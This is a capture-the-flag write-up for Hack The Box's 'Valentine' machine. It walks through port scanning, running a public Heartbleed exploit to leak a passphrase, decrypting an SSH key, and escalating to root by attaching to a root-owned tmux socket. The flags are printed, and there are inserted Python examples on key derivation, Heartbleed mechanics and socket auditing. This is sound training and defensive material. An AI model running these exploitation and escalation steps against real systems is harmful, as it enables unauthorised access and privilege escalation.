Valentine-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: Heartbleed vulnerability, base64 decoding, hex decoding, openssl rsa decryption, ssh parameter configuration, sensitive-information leakage via the .bash_history file, privilege escalation via a tmux misconfiguration

Reference: https://www.mytechonit.com/post/hack-the-box-valentine

Reference: https://0xdf.gitlab.io/2018/07/28/htb-valentine.html

0x01 Getting user access

1. Standard routine first: get the target machine's IP address: 10.10.10.79

2. Summarise the port-scan results and see what information we have

```
┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -min-rate 10000 -p- 10.10.10.79
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -min-rate 10000 -p- -sU 10.10.10.79
PORT STATE SERVICE
5353/udp open zeroconf

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sT -sV -O -p22,80,443,5353 10.10.10.79
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu))
5353/tcp closed mdns

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sT -sV -O -p5353 -sU 10.10.10.79
PORT STATE SERVICE VERSION
5353/tcp closed mdns
5353/udp open mdns DNS-based service discovery

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap --script=vuln -p22,80,443,5353 10.10.10.79
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-04 21:31 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.79
Host is up (0.27s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum:
| /dev/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)'
|_ /index/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
443/tcp open https
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| ssl-heartbleed:
| VULNERABLE:
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| State: VULNERABLE
| Risk factor: High
| OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|
| References:
| http://cvedetails.com/cve/2014-0160/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|_ http://www.openssl.org/news/secadv_20140407.txt
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
| ssl-ccs-injection:
| VULNERABLE:
| SSL/TLS MITM vulnerability (CCS Injection)
| State: VULNERABLE
| Risk factor: High
| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
| does not properly restrict processing of ChangeCipherSpec messages,
| which allows man-in-the-middle attackers to trigger use of a zero
| length master key in certain OpenSSL-to-OpenSSL communications, and
| consequently hijack sessions or obtain sensitive information, via
| a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
| http://www.openssl.org/news/secadv_20140605.txt
|_ http://www.cvedetails.com/cve/2014-0224
|_http-dombased-xss: Couldn't find any DOM based XSS.
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: BID:70574 CVE:CVE-2014-3566
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| References:
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://www.openssl.org/~bodo/ssl-poodle.pdf
| https://www.securityfocus.com/bid/70574
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
5353/tcp closed mdns

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap --script=vuln -p5353 -sU 10.10.10.79
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-04 21:34 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.79
Host is up (0.28s latency).

PORT STATE SERVICE
5353/udp open zeroconf
```
3. Besides the usual ports we found a UDP port, 5353. According to the scan output it is DNS-based service discovery, a local DNS resolution service.

4. I had not come across it before, so a brief note on it here.

Multicast DNS (mDNS) is a **zero-configuration protocol** that lets you perform DNS-like operations on a local network without a conventional unicast DNS server. It uses the same API, packet format and operating semantics as DNS, allowing you to resolve names on the local network. **DNS Service Discovery (DNS-SD)** is a protocol that lets clients use standard DNS queries to **discover a list of named service instances** in a domain (for example test._ipps._tcp.local or linux._ssh._tcp.local). DNS-SD is most often used together with mDNS, but it does not depend on it. Both are used by many IoT devices, such as network printers, Apple TVs, Google Chromecasts, network-attached storage (NAS) devices and cameras. **Default port:** 5353/UDP

5. Enumerate port 5353 and take a look.

```
┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -Pn -sUC -p5353 10.10.10.79
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-04 21:53 CST
Nmap scan report for 10.10.10.79
Host is up (0.28s latency).

PORT STATE SERVICE
5353/udp open zeroconf
| dns-service-discovery:
| 9/tcp workstation
| Address=10.10.10.79 dead:beef::5c52:5f2c:f062:c369
| 22/tcp udisks-ssh
|_ Address=10.10.10.79 dead:beef::5c52:5f2c:f062:c369
```

Vulnerability-wise it mainly involves spoofing / man-in-the-middle attacks and abuse of the service; I won't dig into it further here.

Reference: https://book.hacktricks.xyz/v/cn/network-services-pentesting/5353-udp-multicast-dns-mdns

6. Back to the main thread: the home page is a single image and nothing else.

7. Scan for directories and see what turns up

```
┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://10.10.10.79/

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/kali/.dirsearch/reports/10.10.10.79/-_23-12-04_21-55-47.txt

Error Log: /home/kali/.dirsearch/logs/errors-23-12-04_21-55-47.log

Target: http://10.10.10.79/

[21:55:47] Starting:

[21:57:05] 301 - 308B - /dev -> http://10.10.10.79/dev/
[21:57:05] 200 - 1KB - /dev/
[21:57:20] 200 - 38B - /index.php
[21:57:20] 200 - 38B - /index
[21:57:21] 200 - 38B - /index.php/login/

Task Completed
```

8. We did get some information. /index.php/login/ contains nothing at all, but the /dev/ directory does give us something.

9. Let's look at what the two files contain

Hype_key

notes.txt

```
To do:

1) Coffee.
2) Research.
3) Fix decoder/encoder before going live.
4) Make sure encoding/decoding is only done client-side.
5) Don't use the decoder/encoder until any of this is done.
6) Find a better way to take notes.
```

10. It looks like we are meant to decode the Hype_key file in some way

11. Encoding/decoding is honestly a blind spot for me, so I grabbed someone else's writeup and took a look

12. Suddenly something came back to me: the xxd in there looks very familiar

13. I knew I had learned this, on the HTB Academy platform; clearly this area needs some revision. Next, let's decode the Hype_key file.

```
shiyan@InfoSec Desktop % cat hype_key | xxd -p -r
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46
…
-----END RSA PRIVATE KEY-----% ssshiyan@InfoSec Desktop %
```

14. This part got a bit difficult for me; I followed the writeup to get user.txt first.

15. Write the decoded output to a file named hype_key_encrypted and decrypt it with openssl; when prompted for a pass phrase, enter heartbleedbelievethehype

```
shiyan@InfoSec ~ % cat hype_key | xxd -r -p > hype_key_encrypted

┌──(kali㉿kali)-[~/桌面]
└─$ openssl rsa -in hype_key_encrypted -out hype_key_decrypted
Enter pass phrase for hype_key_encrypted:
writing RSA key
```
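The two commands above do three things that are worth seeing in code: undo the hex encoding (`xxd -r -p`), read the legacy PEM header (`Proc-Type` / `DEK-Info`) to learn that the key is passphrase-encrypted with AES-128-CBC and which IV it uses, and derive the AES key from the passphrase the way `openssl rsa` does. The following is an added example, not code from the writeup or from OpenSSL; it assumes the header shown above and a dummy key body (`AAAA`, constructed, because the page does not reproduce the real one). The key derivation is OpenSSL's legacy `EVP_BytesToKey` with MD5 and a single iteration, which is the reason a guessable passphrase on a legacy PEM key offers so little protection: one MD5 per guess, no salt beyond the first eight IV bytes, no stretching.

```python
import hashlib
import re
from typing import Dict, Optional

# Constructed sample: the hex-decoded header of hype_key as shown above, with the
# base64 key body replaced by a dummy line (the page does not reproduce the body).
SAMPLE_PEM = (
    "-----BEGIN RSA PRIVATE KEY-----\n"
    "Proc-Type: 4,ENCRYPTED\n"
    "DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46\n"
    "\n"
    "AAAA\n"
    "-----END RSA PRIVATE KEY-----\n"
)

# Key sizes for the DEK-Info ciphers that legacy PEM commonly uses.
KEY_LEN = {"AES-128-CBC": 16, "AES-192-CBC": 24, "AES-256-CBC": 32, "DES-EDE3-CBC": 24}


def hexdump_to_bytes(hex_text: str) -> bytes:
    """Equivalent of `xxd -r -p`: drop all whitespace, decode the hex digit pairs."""
    return bytes.fromhex(re.sub(r"\s+", "", hex_text))


def parse_legacy_pem(pem: str) -> Dict[str, Optional[object]]:
    """Read the BEGIN label and the RFC 1421-style encryption headers of a PEM block.
    Returns label, whether it is encrypted, the cipher name and the IV bytes."""
    lines = pem.strip().splitlines()
    begin = re.fullmatch(r"-----BEGIN (.+)-----", lines[0])
    if begin is None or not lines[-1].startswith("-----END "):
        raise ValueError("not a PEM block")
    info: Dict[str, Optional[object]] = {
        "label": begin.group(1), "encrypted": False, "cipher": None, "iv": None,
    }
    for line in lines[1:]:
        if line == "":
            break                                  # blank line ends the header section
        if line.startswith("Proc-Type:"):
            info["encrypted"] = "ENCRYPTED" in line
        elif line.startswith("DEK-Info:"):
            cipher, iv_hex = line.split(":", 1)[1].strip().split(",")
            info["cipher"] = cipher
            info["iv"] = bytes.fromhex(iv_hex)
    return info


def evp_bytes_to_key(passphrase: str, iv: bytes, key_len: int) -> bytes:
    """OpenSSL's legacy PEM key derivation (EVP_BytesToKey, MD5, count = 1):
    D_1 = MD5(pass || salt), D_i = MD5(D_{i-1} || pass || salt), salt = iv[:8].
    Only the key is derived this way; the IV itself comes from DEK-Info."""
    salt = iv[:8]
    derived = b""
    prev = b""
    while len(derived) < key_len:
        prev = hashlib.md5(prev + passphrase.encode() + salt).digest()
        derived += prev
    return derived[:key_len]


if __name__ == "__main__":
    raw = hexdump_to_bytes(SAMPLE_PEM.encode().hex())   # round trip through hex
    info = parse_legacy_pem(raw.decode())
    print(info["label"], "encrypted" if info["encrypted"] else "plain", info["cipher"])
    key = evp_bytes_to_key("heartbleedbelievethehype", info["iv"], KEY_LEN[info["cipher"]])
    print("derived AES key:", key.hex())
```

The practical takeaway for anyone who still has keys in this format: `openssl rsa -out` with no cipher option, as in the writeup, writes the key back out unencrypted, and a key that must stay passphrase-protected is better converted to PKCS#8 with `openssl pkcs8 -topk8 -v2 aes-256-cbc` (PBKDF2 with iterations) or to the OpenSSH native format, both of which make each guess far more expensive than a single MD5.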

16. The pass phrase comes from the Heartbleed finding in the nmap vuln-script scan at the very beginning

```
The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
```
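The nmap description says what Heartbleed does but not why. The following added example (mine, not from the writeup or from OpenSSL) models the heartbeat handling of RFC 6520 in a few lines: a HeartbeatRequest carries a 16-bit `payload_length`, and vulnerable OpenSSL copied that many bytes into the response without checking it against the record it had actually received, so a request that claims a longer payload than it sends gets answered with whatever lay next in process memory. The `ADJACENT_MEMORY` buffer and the secret inside it are constructed stand-ins for that neighbouring memory. The `hardened` branch is the bounds check from the fix: a request whose claimed length does not fit in the record is silently discarded.

```python
import struct
from typing import Optional

HEARTBEAT_REQUEST = 1
HEARTBEAT_RESPONSE = 2
MIN_PADDING = 16      # RFC 6520: at least 16 bytes of padding follow the payload

# Constructed stand-in for whatever happened to sit in the process right after the
# received record (session data, a private key, a password from another connection).
ADJACENT_MEMORY = b"\x00" * 4 + b"hype:heartbleedbelievethehype" + b"\x00" * 8


def build_request(payload: bytes, claimed_length: int) -> bytes:
    """Encode a HeartbeatRequest. claimed_length is what the sender *says* the
    payload length is; an honest client sets it to len(payload)."""
    return (bytes([HEARTBEAT_REQUEST]) + struct.pack("!H", claimed_length)
            + payload + b"\x00" * MIN_PADDING)


def handle_heartbeat(record: bytes, hardened: bool) -> Optional[bytes]:
    """Model the server side. hardened=False reproduces the CVE-2014-0160 logic:
    payload_length is trusted and that many bytes are copied from memory starting
    at the payload. hardened=True adds the check from the fixed OpenSSL. Returns
    the response record, or None when the request is silently discarded."""
    if len(record) < 3:
        return None
    hb_type = record[0]
    payload_len = struct.unpack("!H", record[1:3])[0]
    if hb_type != HEARTBEAT_REQUEST:
        return None
    if hardened and 1 + 2 + payload_len + MIN_PADDING > len(record):
        return None                       # claimed length exceeds the record: discard
    # The copy source is "the payload in memory"; on the vulnerable path the copy
    # simply runs past the end of the record into whatever lies behind it.
    memory = record + ADJACENT_MEMORY
    echoed = memory[3:3 + payload_len]
    return (bytes([HEARTBEAT_RESPONSE]) + struct.pack("!H", payload_len)
            + echoed + b"\x00" * MIN_PADDING)


def leaked_beyond_record(record: bytes, response: bytes) -> bytes:
    """Bytes in the response that did not come from the request record itself,
    i.e. what the peer learned that it should not have."""
    echoed = response[3:-MIN_PADDING]
    return echoed[len(record) - 3:]


if __name__ == "__main__":
    honest = build_request(b"ping", 4)
    print("honest/hardened :", handle_heartbeat(honest, hardened=True))
    oversized = build_request(b"ping", 60)     # claims 60 bytes, sends 4
    vuln = handle_heartbeat(oversized, hardened=False)
    print("leaked bytes    :", leaked_beyond_record(oversized, vuln))
    print("oversized/fixed :", handle_heartbeat(oversized, hardened=True))
```

In the real bug the copied region is the heap next to the SSL record buffer, which is why the writeup's exploit output happened to contain a base64-encoded password that another client had just submitted: the server echoed back up to 64 KiB of neighbouring memory per request, and nothing in the TLS layer logs the exchange. Patching OpenSSL (1.0.1g or later) is the only fix; rotating every key and credential that passed through the process afterwards is the rest of the response.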

17. Use searchsploit to search for the vulnerability

```
┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit Heartbleed
------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------- ---------------------------------
OpenSSL 1.0.1f TLS Heartbeat Extension - ' | multiple/remote/32764.py
OpenSSL TLS Heartbeat Extension - 'Heartbl | multiple/remote/32745.py
OpenSSL TLS Heartbeat Extension - 'Heartbl | multiple/remote/32791.c
OpenSSL TLS Heartbeat Extension - 'Heartbl | multiple/remote/32998.c
------------------------------------------- ---------------------------------
Shellcodes: No Results
```

18. Download the exploit for the first entry

```
┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit -m multiple/remote/32764.py
Exploit: OpenSSL 1.0.1f TLS Heartbeat Extension - 'Heartbleed' Memory Disclosure (Multiple SSL/TLS Versions)
URL: https://www.exploit-db.com/exploits/32764
Path: /usr/share/exploitdb/exploits/multiple/remote/32764.py
Codes: CVE-2014-0346, CVE-2014-0160, OSVDB-105465
Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/桌面/32764.py
```

19. Run the exploit to retrieve information

```
┌──(kali㉿kali)-[~/桌面]
└─$ python2 32764.py 10.10.10.79
Trying SSL 3.0...
Connecting...
Sending Client Hello...
Waiting for Server Hello...
```

20. The dumped memory contains a base64 string; decoded, it is the pass phrase used above

```
┌──(kali㉿kali)-[~/桌面]
└─$ echo aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== | base64 -d
heartbleedbelievethehype
```

21. Honestly, this part is a bit CTF-like: the home page image and the box name, combined with the vulnerability found in the scan, give you the decryption pass phrase. I don't like CTF

22. Since we already have the id_rsa, let's log in over ssh and grab the first flag.

```
┌──(kali㉿kali)-[~/桌面]
└─$ ssh hype@10.10.10.79 -i hype_key_decrypted
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)

* Documentation: https://help.ubuntu.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Fri Feb 16 14:50:29 2018 from 10.10.14.3
hype@Valentine:~$
hype@Valentine:~$ pwd
/home/hype
hype@Valentine:~$ ls
Desktop Downloads Pictures Templates Videos
Documents Music Public user.txt
hype@Valentine:~$ cat user.txt
c531325996c71c033e0b49e967033373
hype@Valentine:~$
```

23. Logging in took me several attempts and kept failing; in the end, with no other option, I used the approach from the comments section and that solved the problem

0x02 Getting root access

24. Honestly, by the time I got here that ssh business had already worn me out...

25. Look at the local .bash_history file

```
hype@Valentine:~$ ls -la
total 148
drwxr-xr-x 21 hype hype 4096 Aug 25 2022 .
drwxr-xr-x 3 root root 4096 Dec 11 2017 ..
-rw------- 1 hype hype 131 Feb 16 2018 .bash_history
-rw-r--r-- 1 hype hype 220 Dec 11 2017 .bash_logout
-rw-r--r-- 1 hype hype 3486 Dec 11 2017 .bashrc
drwx------ 11 hype hype 4096 Dec 11 2017 .cache
drwx------ 9 hype hype 4096 Dec 11 2017 .config
drwx------ 3 hype hype 4096 Dec 11 2017 .dbus
drwxr-xr-x 2 hype hype 4096 Aug 25 2022 Desktop
-rw-r--r-- 1 hype hype 26 Dec 11 2017 .dmrc
drwxr-xr-x 2 hype hype 4096 Dec 11 2017 Documents
drwxr-xr-x 2 hype hype 4096 Dec 11 2017 Downloads
drwxr-xr-x 2 hype hype 4096 Dec 11 2017 .fontconfig
drwx------ 3 hype hype 4096 Dec 11 2017 .gconf
drwx------ 4 hype hype 4096 Dec 11 2017 .gnome2
-rw-rw-r-- 1 hype hype 132 Dec 11 2017 .gtk-bookmarks
drwx------ 2 hype hype 4096 Dec 11 2017 .gvfs
-rw------- 1 hype hype 636 Dec 11 2017 .ICEauthority
drwxr-xr-x 3 hype hype 4096 Dec 11 2017 .local
drwx------ 3 hype hype 4096 Dec 11 2017 .mission-control
drwxr-xr-x 2 hype hype 4096 Dec 11 2017 Music
drwxr-xr-x 2 hype hype 4096 Dec 11 2017 Pictures
-rw-r--r-- 1 hype hype 675 Dec 11 2017 .profile
drwxr-xr-x 2 hype hype 4096 Dec 11 2017 Public
drwx------ 2 hype hype 4096 Dec 11 2017 .pulse
-rw------- 1 hype hype 256 Dec 11 2017 .pulse-cookie
drwx------ 2 hype hype 4096 Dec 13 2017 .ssh
drwxr-xr-x 2 hype hype 4096 Dec 11 2017 Templates
-rw-r--r-- 1 root root 39 Dec 13 2017 .tmux.conf
-rw-rw-r-- 1 hype hype 33 Dec 4 05:26 user.txt
drwxr-xr-x 2 hype hype 4096 Dec 11 2017 Videos
-rw------- 1 hype hype 0 Dec 11 2017 .Xauthority
-rw------- 1 hype hype 12173 Dec 11 2017 .xsession-errors
-rw------- 1 hype hype 9659 Dec 11 2017 .xsession-errors.old
hype@Valentine:~$ cat .bash_history

exit
exot
exit
ls -la
cd /
ls -la
cd .devs
ls -la
tmux -L dev_sess
tmux a -t dev_sess
tmux --help
tmux -S /.devs/dev_sess
exit
hype@Valentine:~$
```

26. Look at the tmux processes

```
hype@Valentine:~$ ps aux | grep tmux
root 1013 0.0 0.1 26416 1688 ? Ss 05:26 0:03 /usr/bin/tmux -S /.devs/dev_sess
hype 5036 0.0 0.0 13576 932 pts/0 S+ 07:52 0:00 grep --color=auto tmux
hype@Valentine:~$
```

27. Run that same command to attach to the root-owned session, which gives us root

```
hype@Valentine:~$ tmux -S /.devs/dev_sess
[exited]

root@Valentine:/home/hype# id
uid=0(root) gid=0(root) groups=0(root)
root@Valentine:/home/hype# id
uid=0(root) gid=0(root) groups=0(root)
root@Valentine:/home/hype# cat /root/root.txt
82d86df32749b04891ebee1cf8e07ff2
root@Valentine:/home/hype# id
```
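The two findings that combine here, the socket path leaking through `.bash_history` and a root-owned tmux server whose socket an unprivileged user can connect to, are both things a host audit can catch before anyone attaches. The following added example (mine, not from the writeup or from tmux) does both: it pulls explicit `tmux -S <path>` socket paths out of a history file, and it classifies who can reach a Unix socket from its owner and mode bits. Connecting to a Unix domain socket needs write permission on the socket inode, so the write bits are what matter. The history text is the lines shown above; the owner/mode combinations in the test are constructed, since the page shows that hype could attach but not the socket's actual permissions.

```python
import os
import re
import stat
from typing import Dict, List, Set

# Constructed sample: the relevant lines from hype's .bash_history shown above.
SAMPLE_HISTORY = """\
ls -la
cd /.devs
tmux -L dev_sess
tmux a -t dev_sess
tmux --help
tmux -S /.devs/dev_sess
exit
"""


def socket_paths_from_history(history: str) -> List[str]:
    """Return every explicit tmux socket path (`tmux ... -S <path>`) in a history file.
    `-L name` sockets live under the user's own tmp directory and are not listed."""
    return re.findall(r"\btmux\s+.*?-S\s+(\S+)", history)


def socket_exposure(owner_uid: int, owner_gid: int, mode: int,
                    caller_uid: int, caller_gids: Set[int]) -> str:
    """Classify who can connect to a Unix socket with these inode attributes.
    Returns 'owner', 'world-writable', 'group-writable' or 'no-access'."""
    if caller_uid == owner_uid:
        return "owner"
    if mode & stat.S_IWOTH:
        return "world-writable"
    if owner_gid in caller_gids and mode & stat.S_IWGRP:
        return "group-writable"
    return "no-access"


def root_socket_reachable(owner_uid: int, exposure: str) -> bool:
    """True when a root-owned server socket is connectable by a non-root caller:
    for tmux that means whoever attaches gets a shell running as root."""
    return owner_uid == 0 and exposure in ("group-writable", "world-writable")


def audit_socket(path: str) -> Dict[str, object]:
    """Live check of one socket on the current host, from the current user's view.
    The parent directory must also be searchable, which is checked separately."""
    st = os.stat(path)
    if not stat.S_ISSOCK(st.st_mode):
        raise ValueError(f"{path} is not a socket")
    gids = set(os.getgroups()) | {os.getgid()}
    exposure = socket_exposure(st.st_uid, st.st_gid, st.st_mode, os.getuid(), gids)
    return {
        "path": path,
        "owner_uid": st.st_uid,
        "exposure": exposure,
        "escalation_risk": root_socket_reachable(st.st_uid, exposure),
        "dir_searchable": os.access(os.path.dirname(path) or "/", os.X_OK),
    }


if __name__ == "__main__":
    for p in socket_paths_from_history(SAMPLE_HISTORY):
        print("socket path from history:", p)
        # Hypothetical attributes, since the real mode of /.devs/dev_sess is not on the page:
        # root-owned, group hype (gid 1000), group-writable, checked as hype.
        exposure = socket_exposure(0, 1000, 0o775, 1000, {1000})
        print("exposure:", exposure, "| root escalation risk:", root_socket_reachable(0, exposure))
```

The fix on the server side is the one tmux already defaults to: keep sockets under a per-user, mode 0700 directory (`/tmp/tmux-<uid>`), never hand a root session's `-S` path to a directory other users can reach, and treat any root-owned socket outside that default location as a finding. On the detection side, `tmux` attaching under a different uid shows up as a new shell child of the root tmux server (PID 1013 above) rather than of the user's sshd session, which is an easy process-tree rule.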

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/127


https://sh1yan.top/2023/12/04/Valentine-htb-writeup/
Author: shiyan
Published: 4 December 2023